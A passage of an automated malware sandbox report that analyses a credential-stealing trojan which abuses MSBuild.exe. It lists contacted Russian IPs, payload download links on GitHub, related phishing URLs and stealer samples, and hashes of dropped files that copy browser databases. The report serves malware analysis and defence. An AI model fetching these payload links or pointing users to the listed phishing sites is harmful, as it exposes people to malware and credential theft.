                    https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exeMSBuild.exe, 00000007.00000002.3278767774.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exeMSBuild.exe, 00000007.00000002.3278767774.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ac.ecosia.org/autocomplete?q=MSBuild.exe, 00000003.00000002.2335934062.0000000003EC3000.00000004.00000800.00020000.00000000.sdmp, Mgxqpwct.tmpdb.3.dr, Dmhie.tmpdb.3.dr, Ohaadlqgh.tmpdb.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://github.com/mgravell/protobuf-netiMSBuild.exe, 00000003.00000002.2352938527.0000000005A40000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2335934062.0000000003E95000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://stackoverflow.com/q/2152978/23354rCannotMSBuild.exe, 00000007.00000002.3278767774.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://stackoverflow.com/q/11564914/23354;MSBuild.exe, 00000003.00000002.2352938527.0000000005A40000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000007.00000002.3278767774.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://stackoverflow.com/q/2152978/23354MSBuild.exe, 00000003.00000002.2352938527.0000000005A40000.00000004.08000000.00040000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchMSBuild.exe, 00000003.00000002.2335934062.0000000003EC3000.00000004.00000800.00020000.00000000.sdmp, Mgxqpwct.tmpdb.3.dr, Dmhie.tmpdb.3.dr, Ohaadlqgh.tmpdb.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLTidyi.tmpdb.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.codeplex.com/DotNetZipMSBuild.exe, 00000003.00000002.2357846379.00000000068C0000.00000004.08000000.00040000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://support.mozilla.orgTidyi.tmpdb.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=MSBuild.exe, 00000003.00000002.2335934062.0000000003EC3000.00000004.00000800.00020000.00000000.sdmp, Mgxqpwct.tmpdb.3.dr, Dmhie.tmpdb.3.dr, Ohaadlqgh.tmpdb.3.drfalse
                    • URL Reputation: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    91.217.76.162
                    		access.samp-global.comRussian Federation
                    		200740FIRST-SERVER-EU-ASRUfalse
                    188.130.138.23
                    		unknownRussian Federation
                    		204490ASKONTELRUfalse
                    62.173.145.78
                    		fermazapoved.ruRussian Federation
                    		34300SPACENET-ASInternetServiceProviderRUtrue

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1487768
                    Start date and time:2024-08-05 05:53:08 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 49s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:10
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:x7myVfh5YS.exe
                    renamed because original name is a hash value
                    Original Sample Name:1de4c3cc42232c1e3d7c09404f57b450.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@9/24@3/3
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 86%
                    • Number of executed functions: 387
                    • Number of non-executed functions: 24
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 52.165.165.26, 199.232.214.172, 192.229.221.95, 52.165.164.15, 20.166.126.56
                    • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report creation exceeded maximum time and may have missing disassembly code information.
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    23:54:15API Interceptor111x Sleep call for process: MSBuild.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    91.217.76.1623868LQ8lzf.exeGet hashmaliciousPureLog StealerBrowse
                      3868LQ8lzf.exeGet hashmaliciousPureLog StealerBrowse

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        fp2e7a.wpc.phicdn.nethttps://pub-7b8cca81dcf84958b8a0d1546cd93eb2.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                        • 192.229.221.95
                        http://kinganik6263.github.io/Login-page/Get hashmaliciousHTMLPhisherBrowse
                        • 192.229.221.95
                        https://com-account91741.info/Get hashmaliciousUnknownBrowse
                        • 192.229.221.95
                        https://drive-8zk.pages.dev/Get hashmaliciousUnknownBrowse
                        • 192.229.221.95
                        https://pub-e9e611a560554869ac6fd846941f56dc.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                        • 192.229.221.95
                        https://sunnatbee.github.io/instagram.com/Get hashmaliciousHTMLPhisherBrowse
                        • 192.229.221.95
                        https://sunnatbee.github.io/instagram.comGet hashmaliciousHTMLPhisherBrowse
                        • 192.229.221.95
                        https://layanan-tarif-transaksi-bni.sfiless.my.id/Get hashmaliciousUnknownBrowse
                        • 192.229.221.95
                        https://bmoreferral.com/Get hashmaliciousUnknownBrowse
                        • 192.229.221.95
                        https://muhemin365.github.io/facebook-login/index.htmlGet hashmaliciousHTMLPhisherBrowse
                        • 192.229.221.95
                        access.samp-global.com3868LQ8lzf.exeGet hashmaliciousPureLog StealerBrowse
                        • 91.217.76.162
                        3868LQ8lzf.exeGet hashmaliciousPureLog StealerBrowse
                        • 91.217.76.162
                        bg.microsoft.map.fastly.nethttp://kinganik6263.github.io/Login-page/Get hashmaliciousHTMLPhisherBrowse
                        • 199.232.210.172
                        http://bobur2014.github.io/instagram.com/Get hashmaliciousHTMLPhisherBrowse
                        • 199.232.214.172
                        https://drive-8zk.pages.dev/Get hashmaliciousUnknownBrowse
                        • 199.232.214.172
                        https://pub-e9e611a560554869ac6fd846941f56dc.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                        • 199.232.210.172
                        https://sunnatbee.github.io/instagram.com/Get hashmaliciousHTMLPhisherBrowse
                        • 199.232.214.172
                        https://saiiabburi.github.io/NetFLlixGet hashmaliciousHTMLPhisherBrowse
                        • 199.232.210.172
                        https://bmoreferral.com/Get hashmaliciousUnknownBrowse
                        • 199.232.214.172
                        https://muhemin365.github.io/facebook-login/index.htmlGet hashmaliciousHTMLPhisherBrowse
                        • 199.232.214.172
                        https://www16172.com/updateGet hashmaliciousUnknownBrowse
                        • 199.232.210.172
                        https://udoblechu.github.io/simple-facebookloginpage/index.htmlGet hashmaliciousUnknownBrowse
                        • 199.232.214.172

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        FIRST-SERVER-EU-ASRU3868LQ8lzf.exeGet hashmaliciousPureLog StealerBrowse
                        • 91.217.76.162
                        3868LQ8lzf.exeGet hashmaliciousPureLog StealerBrowse
                        • 91.217.76.162
                        IyNBllfCw8.exeGet hashmaliciousUnknownBrowse
                        • 45.9.74.189
                        IyNBllfCw8.exeGet hashmaliciousUnknownBrowse
                        • 45.9.74.189
                        4122150841586320226.jsGet hashmaliciousStrela DownloaderBrowse
                        • 45.9.74.36
                        4122150841586320226.jsGet hashmaliciousStrela DownloaderBrowse
                        • 45.9.74.36
                        16809191722972732343.jsGet hashmaliciousStrela DownloaderBrowse
                        • 45.9.74.36
                        16809191722972732343.jsGet hashmaliciousStrela DownloaderBrowse
                        • 45.9.74.36
                        13700433183293912.jsGet hashmaliciousStrela DownloaderBrowse
                        • 45.9.74.36
                        224316069239764085.jsGet hashmaliciousStrela DownloaderBrowse
                        • 45.9.74.36
                        SPACENET-ASInternetServiceProviderRUKBNCt45Gpk.elfGet hashmaliciousMiraiBrowse
                        • 62.173.159.169
                        FcMd5XxxZ0.elfGet hashmaliciousMiraiBrowse
                        • 176.120.81.210
                        dvrLocker.elfGet hashmaliciousUnknownBrowse
                        • 176.120.80.56
                        om4SVF6n0I.elfGet hashmaliciousMiraiBrowse
                        • 176.120.80.91
                        muAZlKU0hq.elfGet hashmaliciousMiraiBrowse
                        • 62.173.159.122
                        sQSqM58mvl.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                        • 176.120.79.55
                        w2wnAQTd6O.elfGet hashmaliciousUnknownBrowse
                        • 176.120.80.97
                        SecuriteInfo.com.Win32.TrojanX-gen.1033.1898.exeGet hashmaliciousAmadey, Mars Stealer, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, VidarBrowse
                        • 176.120.64.84
                        fScyyFcjWw.elfGet hashmaliciousUnknownBrowse
                        • 176.120.64.15
                        6uPZGWXA2x.elfGet hashmaliciousMiraiBrowse
                        • 176.120.64.15
                        ASKONTELRUusdt flash sender 2.exeGet hashmaliciousRedLineBrowse
                        • 109.248.201.180
                        https://toponline.business/exomkvGet hashmaliciousHTMLPhisherBrowse
                        • 46.8.210.233
                        https://signup.primedatecom.pro/signupGet hashmaliciousPhisherBrowse
                        • 46.8.19.194
                        IMG001.exeGet hashmaliciousXmrigBrowse
                        • 46.8.19.60
                        https://drive.google.com/file/d/1e7FGpRopAR3P7JYJwPPalZPEg_iK8VLOGet hashmaliciousUnknownBrowse
                        • 188.130.138.176
                        YTeU5j9j5i.elfGet hashmaliciousUnknownBrowse
                        • 46.8.19.29
                        client.exeGet hashmaliciousUrsnifBrowse
                        • 46.8.210.250
                        client.exeGet hashmaliciousUrsnifBrowse
                        • 46.8.210.250
                        client.exeGet hashmaliciousUrsnifBrowse
                        • 46.8.210.250
                        client.exeGet hashmaliciousUrsnifBrowse
                        • 46.8.210.250

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        3b5074b1b5d032e5620f69f9f700ff0erundll32.exeGet hashmaliciousUnknownBrowse
                        • 62.173.145.78
                        http://kinganik6263.github.io/Login-page/Get hashmaliciousHTMLPhisherBrowse
                        • 62.173.145.78
                        https://pub-e9e611a560554869ac6fd846941f56dc.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                        • 62.173.145.78
                        https://sunnatbee.github.io/instagram.com/Get hashmaliciousHTMLPhisherBrowse
                        • 62.173.145.78
                        https://www16172.com/updateGet hashmaliciousUnknownBrowse
                        • 62.173.145.78
                        http://help-s--metmeask--io-org.webflow.io/Get hashmaliciousUnknownBrowse
                        • 62.173.145.78
                        https://pub-065c935349444a558a5e9b4dac1d6a16.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                        • 62.173.145.78
                        https://aditya-anand227.github.io/fb_login_replica/index.htmlGet hashmaliciousHTMLPhisherBrowse
                        • 62.173.145.78
                        http://pubgmobile.homes/Get hashmaliciousUnknownBrowse
                        • 62.173.145.78
                        https://m-facebookk.com.vn/NvWpvt34CibTO5N3GyRcDA?vGet hashmaliciousHTMLPhisherBrowse
                        • 62.173.145.78

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1338
                        Entropy (8bit):5.3406586469525745
                        Encrypted:false
                        SSDEEP:24:ML9E4KlKDE4KhKiKhRAE4KzecKIE4oKNzKoZsXE4qdKqE4Kx1qE4DJE4j:MxHKlYHKh3oRAHKzectHo60H8HKx1qH1
                        MD5:50DC251CABD311F53342E0B618D1E70B
                        SHA1:4FA5983202E63C4D169712B21DE3963BA7F0E3EE
                        SHA-256:6CEFB5DF8EFEBE9C1DC57D8F5BD3455839E05FA5E8A30D35FFA455D4F0263276
                        SHA-512:3722C0EACA565AD70EC48801F628174C8E7D92E600ACC744BB2E4C3A52DB1AD378ED177C79234AD210C4CA836C21CC257B5A510EBEEAEF5C0ED1A1B1C5B3073D
                        Malicious:false
                        Reputation:low
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Managemen

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x7myVfh5YS.exe.log

                        Download File
                        Process:C:\Users\user\Desktop\x7myVfh5YS.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):42
                        Entropy (8bit):4.0050635535766075
                        Encrypted:false
                        SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                        MD5:84CFDB4B995B1DBF543B26B86C863ADC
                        SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                        SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                        SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                        Malicious:true
                        Reputation:high, very likely benign file
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..

                        C:\Users\user\AppData\Local\Temp\Bcqvo.tmpdb

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):155648
                        Entropy (8bit):0.5407252242845243
                        Encrypted:false
                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                        MD5:7B955D976803304F2C0505431A0CF1CF
                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\Dmhie.tmpdb

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.136413900497188
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                        MD5:429F49156428FD53EB06FC82088FD324
                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\Fsgbbtx.tmpdb

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\Fxrfxqdr.tmpdb

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.8439810553697228
                        Encrypted:false
                        SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                        MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                        SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                        SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                        SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\Giltnx.tmpdb

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.6732424250451717
                        Encrypted:false
                        SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                        MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                        SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                        SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                        SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\Hlpuwjqostv.tmpdb

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):159744
                        Entropy (8bit):0.5394293526345721
                        Encrypted:false
                        SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                        MD5:52701A76A821CDDBC23FB25C3FCA4968
                        SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                        SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                        SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                        Malicious:false
                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\Hwfklpinvb.tmpdb

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):51200
                        Entropy (8bit):0.8746135976761988
                        Encrypted:false
                        SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                        MD5:9E68EA772705B5EC0C83C2A97BB26324
                        SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                        SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                        SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\Iotfcmderp.tmpdb

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):155648
                        Entropy (8bit):0.5407252242845243
                        Encrypted:false
                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                        MD5:7B955D976803304F2C0505431A0CF1CF
                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                        Malicious:false
                        Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\Kgymzfzrs.tmp

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.6732424250451717
                        Encrypted:false
                        SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                        MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                        SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                        SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                        SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\Khllcwnrehw.tmpdb

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                        Category:dropped
                        Size (bytes):196608
                        Entropy (8bit):1.121297215059106
                        Encrypted:false
                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                        MD5:D87270D0039ED3A5A72E7082EA71E305
                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                        Malicious:false
                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\Lvwey.tmpdb

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):155648
                        Entropy (8bit):0.5407252242845243
                        Encrypted:false
                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                        MD5:7B955D976803304F2C0505431A0CF1CF
                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                        Malicious:false
                        Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\Mgxqpwct.tmpdb

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
